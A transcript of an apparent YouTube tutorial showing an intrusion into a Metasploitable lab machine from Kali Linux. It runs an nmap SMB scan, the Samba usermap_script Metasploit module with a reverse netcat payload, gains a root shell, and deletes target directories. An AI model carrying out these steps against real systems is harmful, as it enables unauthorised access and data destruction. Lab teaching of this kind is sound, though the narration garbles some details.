Welcome to another tutorial. In today's tutorial, I'm going to show you just two things. The first thing I want to show is how hackers enumerate systems. And then the second thing I want to show you is how they exploit those systems. Now, if I come here, or if you look at my interface here, you see that I have two operating systems. I have my Kali Linux and I have my Metasploit table. Let's take for example that Kali Linux is the attacker machine and the Metasploit table is the target machine. Let's say that this is an operating system in a corporate environment or in your office, which is supposed to be protected. And then now the hacker wants to get access to this operating system. Now, the first thing I want to show you is that we are going to look at the various files that are found in the Metasploit operating system or in our target operating system. The reason I am doing is because I want to show you the files that are found in the Metasploit operating system, and then I will show you how we are going to sit at the comfort of Kali Linux and delete the files that are found or gain access, enumerate files that are found in the Metasploit table, and even go as far as deleting those files that are found in the target operating system. Meanwhile, we are found in the hacker machine. So now that we have typed ls and we have, if you look here, you see that we have files like Dora, we have vulnerable, we have Paul, we have guild, and all of that. Let us look at what is found in this file called vulnerable. If I do cd and I do vulnerable, and I hit enter and I do ls. ls means I am telling this folder or this directory to list every file or everything that is found inside this vulnerable file or this vulnerable folder, for example, if you want to call it that way. And you can now see that we have files like Miriam, we have Samba, sensitive files, TikiWiki, and all of this. So the purpose of this tutorial is our target here is to sit at the comfort of this Kali Linux and delete these sensitive files here. So let us begin. But before we continue, this tutorial is only for educational purposes. Do not practice this because this is not authorized by law unless you have written information or written documentation. So what do? The first thing we are going to be doing is we are going to use Nmap to make sure that we enumerate or make sure that the ports are open. And which port do we mean here? We want to look at a protocol known as SMB protocol. SMB is a protocol that is used or that helps us to be able to share files in a corporate environment. Take for example, in an office, we usually share files from our printer to our laptop, or from our laptops to our printers. A hacker could enumerate these files and then gain sensitive information to it. So the protocol that does this work is known as SMB, and it runs on port 445. Think of it like this. This is my Metasploit table here. I want to come here and see the various doors and windows that are open here. And for me to do it, I need to use a protocol or a service. The service is called SMB, and the door that it runs on is port 445. These are like digital doors or digital ports. Now, having understand what SMB is and how it works, the next thing we want to do is to see if these various ports or if these digital ports that are on the target operating system are open. How do we do it? For us to be able to do it, I will do a cd dot to come out of this directory. I am going to clear my screen, and the first thing I want to do is I want to check the IP address of my Metasploit or of my target operating system, because as a hacker, for you to hack a system, you must know that target's IP address. For us to know the target's IP address, we're going to do an if config. And we will notice that the target IP address is 192.168.40.132. Now that we have known the target IP address, I am going to come back to my Kali Linux, and the next thing I'm going to do, I'll do sudo nmap-p for ports, and the port that we want to exploit is port 445, and I point it to the Metasploit IP address, which is 192.168.40.132, and I hit enter. It asks for my password. I give it my password and I hit enter, and it runs and it tells us that yes, there is a protocol known as SMB, which runs on port 445 on TCP, and that it is open. It is simply telling us that the door is open, the window to this Metasploit is open. We can be able to gain access to this system by using this port. Now, Gaining access or knowing this information is not enough for a hacker. The hacker must also go as far as knowing the operating system version. It's like someone, or like knowing that somebody's iPhone is vulnerable, and then you don't know the version of that iPhone. You don't know if it is iPhone 17 Pro Max or if it is just iPhone 17. So for us to be able to know the version of this Metasploit, what do we do? We are going to need to run a script, an Nmap script that will help us to enumerate and tell us that this door or that this port is open and that the version that is running is the Metasploit. How do we do this? We do sudo nmap-p for port, give it port 445, and then I will give it dash script. So what am I doing here? I am telling Nmap that Nmap, using port 445, run this script. The script name is SMB-OS-discovery on this target operating system, and the target operating system is what? The SMB, or is the Metasploit table. So if I hit enter, Nmap is going to run, and you can now see that Nmap tells us that port 445, which is running on TCP, is open, and that the script that ran, it's an SMB discovery script, and the operating system, that is the Metasploit operating system, which is the target operating system. The operating system is Unix, and that it is running on Samba. Take note, because we are going to use a script, or we are going to create a payload using this Samba to help us to exploit this system, because it has shown us that the version of the operating system is Samba. It's like knowing the difference between iPhone 17 and iPhone 17 Pro Max, for example, and it is telling us that the name of this operating system is what? Is the Metasploit table. Now that we have gotten this information, what next? I am going to clear my screen, and then we are going to use the second tool for this tutorial, which is msfconsole. I run msfconsole. This is the tool that gives us the various exploits which we are going to use. It gives us the various payloads which we are going to use. So, what then do we do after running this msfconsole? I'm going to just search Samba. Since we saw that our Unix operating system was running on Samba, I will say search Samba to see if I can get a script or a payload that can help us to create a reverse shell that will, or to create a listener that will help us to exploit this target operating system. So when I say search Samba and I hit enter, it now shows us various exploits that are found on the Metasploit table or on our msfconsole, and you can see various scripts. Now this is the exploit I want to use. I want to use this exploit multi Samba user map _ script. So I am going to copy this, and I am going to come down here, and what I'm going to do is I'm going to say msfconsole, use this script that you just gave me, and I paste the script that I copied up there, and I hit enter. Now what you notice that it says exploit multi-samba user script _ samba. We are now inside this script. Now that we are inside this script, or now that we are already using this script, I am going to say show options. Okay, and you can see that for us to be able to use this script as well, we must configure our payload to use what? Netcat. Okay, we are going to use this information as we proceed, but for us to do this, let us say show options and see the various options which this script is going to give us. If I click on enter, you will now see that it tells us that we need a remote host. What is the remote host? Because you can see yes here. Remote host is the target operating system. You can see here the target host. And what is the target host? It is the IP address of the Metasploit table that we are targeting here, or that employee in that corporate environment which we want to exfiltrate data from his operating system. So I am going to say set our host, and I'm going to give it 192.168.140.132, which is the target operating system, and I'm going to hit enter. It says remote host has already been set, pointing to the Metasploit IP address. Now that I've done this, the next thing I want to do is to check my local host and to ensure that it's also set. Even though we have been given given the local host here, which is the IP address of my Kali Linux. If you doubt, you can go to another terminal and you do if config to check the IP address of the Kali Linux operating system, which is the target operating system. If you hit enter, you will see that the IP address is 192.168.40.128. This is the target IP address, which is going to be listening to the connection that is going to be connected to the Metasploit there when we want to exploit that target. So I'm going to minimize this other terminal here, and I come back to this terminal, and I'm going to set the local host here. So I'm going to say set lhost, and I'm going to give it 192.168.40.128, which is the local host, which is the IP address of my Kali Linux or of the attacker operating system. And I hit enter. It says our local host has been set. Now, there is something very vital that we need to do. We need to set a payload. What is a payload? A payload is simply a code that an attacker will create to ruin a target operating system, and then he will gain access to that target operating system. How do we set a payload? I am going to say set payload, and I'm going to give that payload's name as cmd /Unix. Remember, it was running on Unix, or the target operating system here is running on Unix. I give it a / I say reverse, and then I give it underscore, and I give it netcat. That is a payload that I've set there. And I hit enter. It tells me that my payload has been set. Now, to be sure that everything is fine, I'll do show options again to be sure that everything is fine, and I hit enter. Now, let's look at it critically. Who do we want to exploit? Our remote host is 192.168.40.132, which is the target operating system and which is the IP address of the Metasploit. Now, what is the attacker operating system that we are going to use to hack the Metasploit? We are using the local host, and what is the IP address? 192.168.40.128. Everything is fine. We have set everything. So now the next thing that we need to do is to type exploit. And we are telling our Metasploit, or we are telling our multi-samba user map _ script to use this script to exploit this system using that payload that I just created. So if I hit enter, it says started reverse TCP handler on 192.168.40.128. What this is telling us is very simple. It is telling us that we are connecting to our target operating system, and now it says that a shell has been created and there is an open session, and this open session is open on the hacker machine, and this open session which is open on the hacker machine is pointing to the attacker machine, which is the IP address on this ephemeral port, which is port 53,083, and on this date, which is today's date. Now, I am going to thrill you here that we are now done with our exploit, and we are already inside the Metasploit operating system. How do we know that we are already inside the Metasploit operating system? If I do who am I, and I hit enter, it says that I am root. Okay, if I do ls, you now see that these are several files here. Now, look at this file, gil. If I come back to my Metasploit here and I do ls, let me clear my screen, and I do ls, what do you notice? There is a file here known as gil, or there is a directory here known as gil. Remember that the file which you wanted to gain access to and to delete or to compromise was on the vulnerable folder. So if I do cd vulnerable, let us see it. cd vulnerable, cd vulnerable, to see the file that I found in this vulnerable file, and I do ls, you will see that we have a certain file known as sensitive files. Our target is we want to delete this file here by using the Kali Linux operating system. So if I come to Kali Linux now and we have a directory here known as home. If I do cd home and I hit enter and I do ls to list the various files that I found on this folder called home, and I hit enter, it says that under the directory home, there is a file transfer protocol, there is MSF admin, there are services, and there is a user. Now, if I do CD to see what is found inside MSF admin, to see the files that are found inside this MSF admin or the folders that are found here, and I do ls and I hit enter and do ls, you see that there is a certain file here known as vulnerable, right? Which is the same file that we have here, vulnerable. Now, if I come here now, we want to see every other information that is found inside this vulnerable, and I do cd vulnerable. No, and I do cd vulnerable. Sorry for that. Vulnerable. And I hit ls. You see that these are the various files that are found inside that vulnerable directory. We have ls, we have Miriam, we have MySQL, Samba, and these are those sensitive files. Now, it is time to do away with these sensitive files from this directory. When I do it, I'm going to come back here, and you are going to see that if I do an ls, for example, that file is still there. Let me now come back here and delete these sensitive files. So I am going to do remove dir. Whenever you want to delete folders or you want to delete files like this, you do rmdir, and I say sensitive files, and I hit enter. Okay. Now, if I do ls again here, you will see that under this we no longer have that file. Let us come here now, and I just do a simple ls like this. What do you see? You discover that that vulnerable file is no longer there, or that sensitive file is no longer there. Now there's another file called Mariam, and there's another file called TU. If I come back here and I do remove dir TU and I hit enter, and I come back here and I do ls, what do you see? You see that we have Mariam, MySQL, Samba, TikiWiki, and this, and there is no longer TU here. So this is how hackers, malicious actors gain access to sensitive information, enumerate files, exploit systems for malicious purposes, exfiltrate data, and even compromise those information. Remember that cybersecurity has 3 pillars: confidentiality, integrity, and availability. Lack of this means those pillars or cybersecurity have not attained its goal. These are files that we just compromised, and these are files that we just modified, meaning that we have breached confidentiality and integrity. My name is Banakengion. I am happy that you watched the tutorial till the end. Don't forget to subscribe to my YouTube channel for more tutorials like this. Bye bye.